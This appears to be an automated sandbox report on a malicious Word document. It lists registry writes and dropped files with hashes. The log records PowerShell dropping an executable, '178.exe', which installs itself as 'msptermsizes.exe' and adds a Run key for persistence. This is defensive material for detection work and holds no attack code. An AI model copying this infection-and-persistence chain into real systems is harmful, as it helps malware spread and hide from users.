Raavi
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Small Fonts
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
System
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Terminal
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
26177273
3888
chrome.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
LanguageList
en-US
2604
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
LanguageList
en-US
2604
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
2604
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
2604
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
2604
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
2604
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
2604
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
2604
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
2604
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
2604
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
2604
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
2604
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
2604
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
2604
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2604
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3216
msptermsizes.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msptermsizes_RASAPI32
EnableFileTracing
0
3216
msptermsizes.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msptermsizes_RASAPI32
EnableConsoleTracing
0
3216
msptermsizes.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msptermsizes_RASAPI32
FileTracingMask
4294901760
3216
msptermsizes.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msptermsizes_RASAPI32
ConsoleTracingMask
4294901760
3216
msptermsizes.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msptermsizes_RASAPI32
MaxFileSize
1048576
3216
msptermsizes.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msptermsizes_RASAPI32
FileDirectory
%windir%\tracing
3216
msptermsizes.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msptermsizes_RASMANCS
EnableFileTracing
0
3216
msptermsizes.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msptermsizes_RASMANCS
EnableConsoleTracing
0
3216
msptermsizes.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msptermsizes_RASMANCS
FileTracingMask
4294901760
3216
msptermsizes.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msptermsizes_RASMANCS
ConsoleTracingMask
4294901760
3216
msptermsizes.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msptermsizes_RASMANCS
MaxFileSize
1048576
3216
msptermsizes.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msptermsizes_RASMANCS
FileDirectory
%windir%\tracing
3216
msptermsizes.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3216
msptermsizes.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000093000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
3216
msptermsizes.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
msptermsizes
"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"

Files activity

Executable files
2
Suspicious files
33
Text files
190
Unknown types
29

Dropped files

PID
Process
Filename
Type
4076
178.exe
C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
executable
MD5: 42b188b8832ec9e0192a533252d73b4b
SHA256: 3251a00155619dd1ba363b7fe477dab326fe791d2135129d3133c0cb716dd58b
2604
powershell.exe
C:\Users\admin\178.exe
executable
MD5: 42b188b8832ec9e0192a533252d73b4b
SHA256: 3251a00155619dd1ba363b7fe477dab326fe791d2135129d3133c0cb716dd58b
2980
chrome.exe
C:\Users\admin\AppData\Local\Temp\scoped_dir2980_31194\CRX_INSTALL\_locales\ro\messages.json
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlUws.store_new
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlBilling.store_new
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSuspiciousSite.store_new
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeUrlClientIncident.store
binary
MD5: bd2a05bc63a946ea99e1de94c59059c0
SHA256: 46a9238c3152029a3371ba7b757cac42b7feb9bfbf9f196b1fdd990261065978
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlMalware.store
binary
MD5: 262e7afd4bb0cf795de966ea8904d76c
SHA256: b262e54bfd865c447a36a905bb43ac866a984596c87fce467efe0fdfc87d1fed
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlCsdWhitelist.store
binary
MD5: 0210a4e90ab9aa98e032094ac7618648
SHA256: ab00e0d124fcbc4c8457934a1c72bb6df0c35b5191f259d3e9644e925a611e9c
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSubresourceFilter.store
binary
MD5: f8c02e02d90469a823df69a1a4ab9e23
SHA256: fb54606ca0180ec1f3a28dc2fff93db2987f8d503a50c0a3d6a87da7e70e6530
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeUrlClientIncident.store_new
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlMalware.store_new
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSubresourceFilter.store_new
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlCsdWhitelist.store_new
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlCsdDownloadWhitelist.store
binary
MD5: 46717e658eab1b27369520c411e798dd
SHA256: dd07218a8f0b27c1e3e57b8fc517ff68e34f1c87e6ab8ca686c4730cdcda6c93
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeExtMalware.store
binary
MD5: 5880d0139f5d0c4f251a10e7bc086dd1
SHA256: aeaeb24fc4f7084bf079502c41a1e33ca65417304afa3f0a79340067de6d484a
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlCsdDownloadWhitelist.store_new
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeExtMalware.store_new
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSoceng.store
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSoceng.store_new
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlMalBin.store
binary
MD5: 7c68f0104a1ee8dfe16a25ecac16de1f
SHA256: f6cf9d9e5c21ed60ce1af95630b97bd2fefc905a70e60e5a463f75bfb991da10
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlMalBin.store_new
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\IpMalware.store
binary
MD5: 43424ec9a25f29f141319f796f26ce91
SHA256: 2906a981195b60d9d011e0447981e7f9082c2b2089517e81f42b380f5c9248d8
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\CertCsdDownloadWhitelist.store
binary
MD5: da00f5f8a1e4bdb532342a9f0ab950a3
SHA256: 48efa99cdf638eb242b760569e6dbf15c0d0c78d6fa1e4e64ea15543d6bbca5a
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\CertCsdDownloadWhitelist.store_new
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\IpMalware.store_new
––
MD5:  ––
SHA256:  ––
2304
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State
text
MD5: c424c945946a1ce57a1fb77ea09d2f91
SHA256: 22711f4df802a291c27836c34b6ce57206a93395a38ce57541729fa0f5839ae1
2304
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State~RF12bb0b.TMP
text
MD5: c424c945946a1ce57a1fb77ea09d2f91
SHA256: 22711f4df802a291c27836c34b6ce57206a93395a38ce57541729fa0f5839ae1
2304
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\9f36d50b-02fc-48f0-a858-1a3f36ff00b9.tmp
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State~RF129f84.TMP
text
MD5: dcde50b5659a13b2eb90dcc4c67e9eb0
SHA256: 274509c252086331ffefb85a3efc53dfd5516d47e2f51e4a86310dce5c4b5ad2
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\79e0ea81-9df7-430c-bea1-3d3babefa72d.tmp
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSuspiciousSite.store
binary
MD5: b9dbbc8718f0528e616322e23d61150b
SHA256: 866265d78e1ada99385e58086ed6b01dd9b33060358b80e3b2254e48cb7d4fb6
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlBilling.store
binary
MD5: 4e91a119f84f9d834dc0c4ab4319095b
SHA256: 85023a5ed745157dc52e252ff637d2bcfb2f9a20b6b208122b433925d6457fd2
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State
text
MD5: dcde50b5659a13b2eb90dcc4c67e9eb0
SHA256: 274509c252086331ffefb85a3efc53dfd5516d47e2f51e4a86310dce5c4b5ad2
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State~RF1261ee.TMP
text
MD5: dcde50b5659a13b2eb90dcc4c67e9eb0
SHA256: 274509c252086331ffefb85a3efc53dfd5516d47e2f51e4a86310dce5c4b5ad2
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\73e10143-6320-48e9-8d9f-1d69bf3917cf.tmp
––
MD5:  ––
SHA256:  ––
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RF12601a.TMP
text
MD5: 8eda1174e172b65b8e29bf1899a4bc39
SHA256: b8a02870bda7dc25cf67e323b51ffd200e733b25abc42ee7eabcaafb40632cf3
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
text
MD5: 8eda1174e172b65b8e29bf1899a4bc39
SHA256: b8a02870bda7dc25cf67e323b51ffd200e733b25abc42ee7eabcaafb40632cf3
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\83c8ee47-dbff-4cd3-9f46-61cb92f8e22e.tmp
––
MD5:  ––
SHA256:  ––
2604
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: c911f7dbbf8956a476a7162fd7a88b15
SHA256: 2d59cfc009032c59a8a26237f4091bd155e115da834ff623af40bc693711af85
2604
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF124241.TMP
binary
MD5: c911f7dbbf8956a476a7162fd7a88b15
SHA256: 2d59cfc009032c59a8a26237f4091bd155e115da834ff623af40bc693711af85
2604
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CYFUJ1LPNIWNAEW70SKM.temp
––
MD5:  ––
SHA256:  ––
2504
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\OICE_9C297798-83CA-4EB2-9765-B81E6AA3B8F6.0\~DFC61AA40CB82C6BBC.TMP
––
MD5:  ––
SHA256:  ––
2780
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3D068F6.wmf
wmf
MD5: 763f8f274b43067e27bd8f2386d0cc75
SHA256: 7802ccab1c08f15ffaefe235a9c003f3337a184716afba02424304e574b21b2a
2780
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FD4FC89.wmf
wmf
MD5: 68e547de1484991ad9c38725b17c6100
SHA256: 9cfbd40e2726029d4ae4daa0c30f46ef604ce5b56e1ae195a0f2ab9f7c858c51
2780
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA924C83.wmf
wmf
MD5: 8a0a74baa2784df0363371ad766712c4
SHA256: aa44ae7ee385869d3d69f51d38f56d1318b062b047556103f6c76ecad179bcaa
2780
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3CB514A8.wmf
wmf
MD5: b9d22ae65286cb864928c2f1750b1849
SHA256: b4fb4d840739291e74adff1e16832141aac7b62fb373312e7476e595fc341430
2780
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8666FB9C.wmf
wmf
MD5: c7bd1ce960f78e72421d635bf9fe82db
SHA256: 48a56af82eb2c783083ec425eec5af743ac64f1980ca3ddd8f5ce8f287bdab48
2780
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6DB6EEED.wmf
wmf
MD5: 78968eb6613489b47b425c8ea66f27a8
SHA256: c29eeaf6b10a597ddc0c55e3e5dab4f5f2925607292459751bcccecf780f62d7
2780
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CAA1900A.wmf
wmf
MD5: 9b95709437c6decf3b577f4dce0fcc59
SHA256: 555072537a67c81e2333c151a38720879534884030b14ad117a9fbb0d5fb6591
2780
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0E543DE.wmf
wmf
MD5: 7ddf99e29c48d05280ae61071828c616
SHA256: dfcde5667248746ddc00bc5d11d46340fb5140725f2517fb113753b56473dc2f
2780
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E7213111.wmf
wmf
MD5: 9ca70e577cadbb131e20f402cf6143da
SHA256: 3a300bead2f06048bfb71656d68d69accc33496bd57ee0ec17ce81f61a3717e8
2780
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C55CE647.wmf
wmf
MD5: 2344f33a41453e14a0410437115f9710
SHA256: cc735fab5b9d09bce7b5af8bb2394145ed9882c2b7ce6909cb6e62d394f92549
2780
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4CCD69CB.wmf
wmf
MD5: 3904440b860f48d98cf95199d50e5ac8
SHA256: 374fbda7cb06ff3cd25b7b05ee3b0e008cf81b137d81abe32a9712d350ce2a29
2780
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13684150.wmf
wmf
MD5: 8ff4bf291d866461c186b09855f09ef3
SHA256: 95ccbaf67c24da86a8bd19519cdf00ff6b56f9f010356bccc4058e3dcdfe97ab
2780
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd
tlb
MD5: c995dc33404b09e53968bf2461557a2d
SHA256: a6de0b31c86669394ed0126f4bdc63682b68fc1382082e3fd5ea8bf4a2b8dbba
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RF1216bc.TMP
text
MD5: 89dce3eeb80b2f47e0141e831fbbe059
SHA256: 1129ff01f51f8d45acf25c95136eecd2b593348ec805336bbb100ac447dfda2a
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
text
MD5: 89dce3eeb80b2f47e0141e831fbbe059
SHA256: 1129ff01f51f8d45acf25c95136eecd2b593348ec805336bbb100ac447dfda2a
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\2b43714a-b92d-48be-8c02-f56934099f3f.tmp
––
MD5:  ––
SHA256:  ––
2504
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\OICE_9C297798-83CA-4EB2-9765-B81E6AA3B8F6.0\B9B8F671.wmf
wmf
MD5: 68e547de1484991ad9c38725b17c6100
SHA256: 9cfbd40e2726029d4ae4daa0c30f46ef604ce5b56e1ae195a0f2ab9f7c858c51
2504
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\OICE_9C297798-83CA-4EB2-9765-B81E6AA3B8F6.0\420C2430.wmf
wmf
MD5: 8a0a74baa2784df0363371ad766712c4
SHA256: aa44ae7ee385869d3d69f51d38f56d1318b062b047556103f6c76ecad179bcaa
2504
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\OICE_9C297798-83CA-4EB2-9765-B81E6AA3B8F6.0\7218E655.wmf
wmf
MD5: 9ca70e577cadbb131e20f402cf6143da
SHA256: 3a300bead2f06048bfb71656d68d69accc33496bd57ee0ec17ce81f61a3717e8
2504
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\OICE_9C297798-83CA-4EB2-9765-B81E6AA3B8F6.0\4AE8002B.wmf
wmf
MD5: 78968eb6613489b47b425c8ea66f27a8
SHA256: c29eeaf6b10a597ddc0c55e3e5dab4f5f2925607292459751bcccecf780f62d7
2504
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\OICE_9C297798-83CA-4EB2-9765-B81E6AA3B8F6.0\35569052.wmf
wmf
MD5: 2344f33a41453e14a0410437115f9710
SHA256: cc735fab5b9d09bce7b5af8bb2394145ed9882c2b7ce6909cb6e62d394f92549
2504
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\OICE_9C297798-83CA-4EB2-9765-B81E6AA3B8F6.0\3DD61EA4.wmf
wmf
MD5: 3904440b860f48d98cf95199d50e5ac8
SHA256: 374fbda7cb06ff3cd25b7b05ee3b0e008cf81b137d81abe32a9712d350ce2a29
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
text
MD5: 2de837bf985c0e77afbb235cc7a14efd
SHA256: 0f7502875575b2d9e865526b7ed774f5cf9a382493e974d125d13c4249a34a2f
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences~RF11ffaa.TMP
text
MD5: 2de837bf985c0e77afbb235cc7a14efd
SHA256: 0f7502875575b2d9e865526b7ed774f5cf9a382493e974d125d13c4249a34a2f
2980
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\9e99791d-077a-4777-9797-af648eb951dd.tmp
––
MD5:  ––
SHA256:  ––
2504
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\OICE_9C297798-83CA-4EB2-9765-B81E6AA3B8F6.0\msoFE81.tmp
compressed
MD5: 34728d28b0d7587a7511bfdcd743216c
SHA256: 03d850d4bf340fc1e73c7e0a250ab60c33854effe1438d91d2114007d05621eb
2780
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\OICE_9C297798-83CA-4EB2-9765-B81E6AA3B8F6.0\B32FD872.doc:Zone.Identifier
text
MD5: fbccf14d504b7b2dbcb5a5bda75bd93b
SHA256: eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
2780
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\OICE_9C297798-83CA-4EB2-9765-B81E6AA3B8F6.0\B32FD872.doc
document
MD5: f1212f1494b917465cf53d42447b17b5
SHA256: 020d304a630900854cea9666409dd76f51a35b3d3d60c9ba0c512d59e6b25093
2780
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\OICE_9C297798-83CA-4EB2-9765-B81E6AA3B8F6.0\B32FD872.doc\:Zone.Identifier:$DATA
––
MD5:  ––
SHA256:  ––
2780
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\LLC_3967441212124_V.doc.LNK
lnk
MD5: 7df6a432571094284e64815ee786cbed
SHA256: 021da6516781dd2200e0534411b661e6c0d8179dadec7f2450409722ffb3c0c0
2780
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: d7d4c2ac0bf8981b4e85a16f5070c5cd
